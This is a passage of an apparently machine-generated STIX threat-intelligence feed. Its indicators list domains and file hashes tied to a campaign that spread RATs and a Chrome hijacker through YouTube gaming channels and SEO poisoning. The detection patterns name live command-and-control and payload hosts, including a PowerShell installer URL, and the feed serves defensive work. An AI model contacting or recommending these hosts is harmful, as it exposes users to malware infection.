filescloud.pro","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: xspace[.]com ; ikx.filexspace[.]com ; filexstorage[.]site ; filescloud[.]pro ; zippyfiles[.]net ; mifilesx[.]site ; dw.xrsdownload[.]c","pattern":"[domain-name:value = 'filescloud.pro']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e8fa67ae-088f-4991-b0b2-752c95c55cee","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: filexspace.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: helake[.]info ; uy.basesfiles[.]com ; basesfile[.]com ; igk.filexspace[.]com ; ikx.filexspace[.]com ; filexstorage[.]site ; filescloud","pattern":"[domain-name:value = 'filexspace.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a6c91977-a266-401a-96dd-b28240e26f1b","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: filexstorage.site","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: sfile[.]com ; igk.filexspace[.]com ; ikx.filexspace[.]com ; filexstorage[.]site ; filescloud[.]pro ; zippyfiles[.]net ; mifilesx[.]site ;","pattern":"[domain-name:value = 'filexstorage.site']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2edd8539-b38a-439c-8830-a4004472c3ea","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: finersto.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ARKTunnel WebSocket RAT C2 server Domain vendralo[.]info ; finersto[.]com ; mqsearch[.]com ; extentrack[.]com ; drelto[.]info Docro","pattern":"[domain-name:value = 'finersto.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a6979c4a-ec24-4b33-9d67-3f254619dc72","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: fuelleg.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: lview[.]xyz ; trickflag[.]info ; suitstraw[.]info ; connect.fuelleg[.]info ; vesselsystem[.]xyz ; minewave[.]info ; collartitle[.]in","pattern":"[domain-name:value = 'fuelleg.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--25d54534-2fb9-40e8-91fa-4ca05791f913","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: ggclicker.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: es[.]net ; mifilesx[.]site ; dw.xrsdownload[.]com ; storage.ggclicker[.]com ; watchadvance[.]com Initial-access SEO-poisoning and fak","pattern":"[domain-name:value = 'ggclicker.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--57cdb1cb-34ae-4deb-bdaf-6f06db120ff7","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: mifilesx.site","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: filexstorage[.]site ; filescloud[.]pro ; zippyfiles[.]net ; mifilesx[.]site ; dw.xrsdownload[.]com ; storage.ggclicker[.]com ; watcha","pattern":"[domain-name:value = 'mifilesx.site']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1c0e5c25-b66c-41c0-a277-9cc7151c8675","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: minewave.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: traw[.]info ; connect.fuelleg[.]info ; vesselsystem[.]xyz ; minewave[.]info ; collartitle[.]info ; boardmagic[.]info ; placespoon[.]x","pattern":"[domain-name:value = 'minewave.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--51b94d6d-2df2-4684-b915-09748d5ee134","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: mqsearch.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ket RAT C2 server Domain vendralo[.]info ; finersto[.]com ; mqsearch[.]com ; extentrack[.]com ; drelto[.]info Docro Hijacker rule de","pattern":"[domain-name:value = 'mqsearch.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3a308f87-cd8c-47d8-bdc3-59203c8c0097","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: needcherries.online","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: collartitle[.]info ; boardmagic[.]info ; placespoon[.]xyz ; needcherries[.]online OfferLoader installation-tracker infrastructure Domain ve","pattern":"[domain-name:value = 'needcherries.online']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--929c9f25-e317-4382-b70e-6352d4bb387f","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: noiseship.cfd","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: earch hijacking, callback, and script infrastructure Domain noiseship[.]cfd ; atthelake[.]info ; uy.basesfiles[.]com ; basesfile[.]co","pattern":"[domain-name:value = 'noiseship.cfd']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7b78e395-f013-4634-8738-43eac8789634","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: pcsdkflyer.ca","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ia RAT stage hosts and Python-agent C2 typosquat Domain reg.pcsdkflyer[.]ca ARKTunnel WebSocket RAT C2 server Domain vendralo[.]info","pattern":"[domain-name:value = 'pcsdkflyer.ca']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d02702d7-99eb-4216-a33b-3c1fcf95780a","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: placespoon.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: minewave[.]info ; collartitle[.]info ; boardmagic[.]info ; placespoon[.]xyz ; needcherries[.]online OfferLoader installation-tracker","pattern":"[domain-name:value = 'placespoon.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f579ca67-ec0c-4b9a-abd9-c3323fb4c217","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: statementtouch.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ake file-hosting infrastructure Domain voyagemist[.]space ; statementtouch[.]xyz ; chawton[.]info OfferLoader payload handoff and second-s","pattern":"[domain-name:value = 'statementtouch.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3e5a86f2-3dfa-4375-be49-d7bd437e9927","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: stryper.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: cro\\ Docro Chrome extension installation path URL hxxps[:]//stryper[.]info/t.ps1 Stage-two PowerShell installer for Insomnia RAT URL","pattern":"[domain-name:value = 'stryper.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--52b1affa-246d-4208-9656-78cda2ea57e2","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: suitstraw.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: nd-stage hosts Domain animalview[.]xyz ; trickflag[.]info ; suitstraw[.]info ; connect.fuelleg[.]info ; vesselsystem[.]xyz ; minewave[","pattern":"[domain-name:value = 'suitstraw.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5837fe30-91f5-4c1d-889e-9cd17c25ed51","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: trickflag.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ad handoff and second-stage hosts Domain animalview[.]xyz ; trickflag[.]info ; suitstraw[.]info ; connect.fuelleg[.]info ; vesselsyste","pattern":"[domain-name:value = 'trickflag.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--86243bf3-2abf-4399-bcbd-c77bbeddc661","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: vendralo.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: eg.pcsdkflyer[.]ca ARKTunnel WebSocket RAT C2 server Domain vendralo[.]info ; finersto[.]com ; mqsearch[.]com ; extentrack[.]com ; dr","pattern":"[domain-name:value = 'vendralo.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e1b9b3c6-c5d1-4bb0-b53e-26c434efbe3e","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: venrx.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ot[.]com ; venrx.blogspot[.]com ; venrxhub.blogspot[.]com ; venrx[.]xyz ; ravexoffical.blogspot[.]com ; adex-blog.blogspot[.]com","pattern":"[domain-name:value = 'venrx.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--55eedf5d-a5c3-45cc-8f38-bea8257c4329","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: vesselsystem.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ckflag[.]info ; suitstraw[.]info ; connect.fuelleg[.]info ; vesselsystem[.]xyz ; minewave[.]info ; collartitle[.]info ; boardmagic[.]inf","pattern":"[domain-name:value = 'vesselsystem.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3e0db53a-6b23-4738-b89d-bf374e7eeb46","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: voyagemist.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: s SEO-poisoning and fake file-hosting infrastructure Domain voyagemist[.]space ; statementtouch[.]xyz ; chawton[.]info OfferLoader paylo","pattern":"[domain-name:value = 'voyagemist.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--04964b60-e75b-4068-894e-504afd399d51","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: watchadvance.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: x[.]site ; dw.xrsdownload[.]com ; storage.ggclicker[.]com ; watchadvance[.]com Initial-access SEO-poisoning and fake file-hosting infras","pattern":"[domain-name:value = 'watchadvance.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5920481c-4998-4408-ba5e-9772a611fd49","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: xrsdownload.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: filescloud[.]pro ; zippyfiles[.]net ; mifilesx[.]site ; dw.xrsdownload[.]com ; storage.ggclicker[.]com ; watchadvance[.]com Initial-ac","pattern":"[domain-name:value = 'xrsdownload.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--97f3d7dd-c07e-4757-a497-c990fe47a908","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: zippyfiles.net","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: filexspace[.]com ; filexstorage[.]site ; filescloud[.]pro ; zippyfiles[.]net ; mifilesx[.]site ; dw.xrsdownload[.]com ; storage.ggclic","pattern":"[domain-name:value = 'zippyfiles.net']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b2927c34-2d9e-44f0-a16f-86b01ea70213","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 06e0afd01bbc6c9d5dc16c3165089b233dc071e1f251abd06235d1b9166cdac5","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: de3cdf Resource icon shared across ARKTunnel samples SHA256 06e0afd01bbc6c9d5dc16c3165089b233dc071e1f251abd06235d1b9166cdac5 Resource icon shared across ARKTunnel samples SHA256 2c6e11","pattern":"[file:hashes.'SHA-256' = '06e0afd01bbc6c9d5dc16c3165089b233dc071e1f251abd06235d1b9166cdac5']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8371c246-f946-49d5-896f-69b6db110b4f","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 25558ea78c4aa0fdd0f45fafcaa546d3115dc5806809d144a5801a40e48fd4c5","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: 9ed15ce1a6961 eld0.exe , Insomnia RAT initial loader SHA256 25558ea78c4aa0fdd0f45fafcaa546d3115dc5806809d144a5801a40e48fd4c5 eld0.tmp unpacked loader stage SHA256 9b0d9cbc0fd4a7bae8b78","pattern":"[file:hashes.'SHA-256' = '25558ea78c4aa0fdd0f45fafcaa546d3115dc5806809d144a5801a40e48fd4c5']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--20fd94d0-00ff-4d8f-bd62-ebc9884f547b","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 2c6e11027b011042c9a118fc20728f8f4ebb6be8795cc84cc9a45622c297d354","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: 6cdac5 Resource icon shared across ARKTunnel samples SHA256 2c6e11027b011042c9a118fc20728f8f4ebb6be8795cc84cc9a45622c297d354 eld2.exe , Docro Hijacker branch installer SHA256 553ce594c","pattern":"[file:hashes.'SHA-256' = '2c6e11027b011042c9a118fc20728f8f4ebb6be8795cc84cc9a45622c297d354']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--efd29ce3-6ea1-412f-9e3b-8911800e2c18","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 3052bd320a34e12ee694811ed0578797477dfd480c664491e509ed15ce1a6961","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: efff1f2d73 windirstat.tmp unpacked OfferLoader stage SHA256 3052bd320a34e12ee694811ed0578797477dfd480c664491e509ed15ce1a6961 eld0.exe , Insomnia RAT initial loader SHA256 25558ea78c4aa","pattern":"[file:hashes.'SHA-256' = '3052bd320a34e12ee694811ed0578797477dfd480c664491e509ed15ce1a6961']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--32f448f5-4ac3-44e5-8230-dcaecd058cdc","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 553ce594c9c6afdd4794fddc28c194e3bc3c1b052310e5099c58ac15bab72104","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: 2c297d354 eld2.exe , Docro Hijacker branch installer SHA256 553ce594c9c6afdd4794fddc28c194e3bc3c1b052310e5099c58ac15bab72104 eld2.tmp , unpacked Docro Hijacker stage SHA256 fdcc95b7791","pattern":"[file:hashes.'SHA-256' = '553ce594c9c6afdd4794fddc28c194e3bc3c1b052310e5099c58ac15bab72104']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2b2b17d1-d5e6-4e34-bfdb-61ca3d50a34b","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 62d49d0c78207ec2452cc8a30501db771c9edbae89889e41a7dd227551243e8e","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: de Python component of the Insomnia RAT dual payload SHA256 62d49d0c78207ec2452cc8a30501db771c9edbae89889e41a7dd227551243e8e aa.js , Node.js component of the Insomnia RAT dual payload","pattern":"[file:hashes.'SHA-256' = '62d49d0c78207ec2452cc8a30501db771c9edbae89889e41a7dd227551243e8e']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e44369f5-6160-4447-88c6-64f380d3acd9","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 7f792c45de1e28fd42ac44c9444f157a2161742d130bac336c0e991aabbb112c","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: rs of Compromise (IoCs):- Type Indicator Description SHA256 7f792c45de1e28fd42ac44c9444f157a2161742d130bac336c0e991aabbb112c Trojanized windirstat.exe OfferLoader installer delivered t","pattern":"[file:hashes.'SHA-256' = '7f792c45de1e28fd42ac44c9444f157a2161742d130bac336c0e991aabbb112c']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--83aa7550-fd0a-4cb3-b464-8421c85923ab","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 9b0d9cbc0fd4a7bae8b78a15dfbe63052779414ad725845732c4a0083008da69","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: 9d144a5801a40e48fd4c5 eld0.tmp unpacked loader stage SHA256 9b0d9cbc0fd4a7bae8b78a15dfbe63052779414ad725845732c4a0083008da69 a.dll , PowerShell downloader for Insomnia RAT stages SHA25","pattern":"[file:hashes.'SHA-256' = '9b0d9cbc0fd4a7bae8b78a15dfbe63052779414ad725845732c4a0083008da69']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ae520830-5c6f-47d4-942e-4acbe16617f1","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: aaebc8c07de485be6d1bfa956668c5e18aa1ff5588dfe84672e20ae90b4560f1","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: , Node.js component of the Insomnia RAT dual payload SHA256 aaebc8c07de485be6d1bfa956668c5e18aa1ff5588dfe84672e20ae90b4560f1 eld1.exe , ARKTunnel steganography dropper SHA256 e05bc22af","pattern":"[file:hashes.'SHA-256' = 'aaebc8c07de485be6d1bfa956668c5e18aa1ff5588dfe84672e20ae90b4560f1']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3e81adf5-5504-466a-a358-6a3777edbacf","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: b367762140ae7f5098230b8a5da738c9241f286281ec9439dd6ca581fc87989c","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs 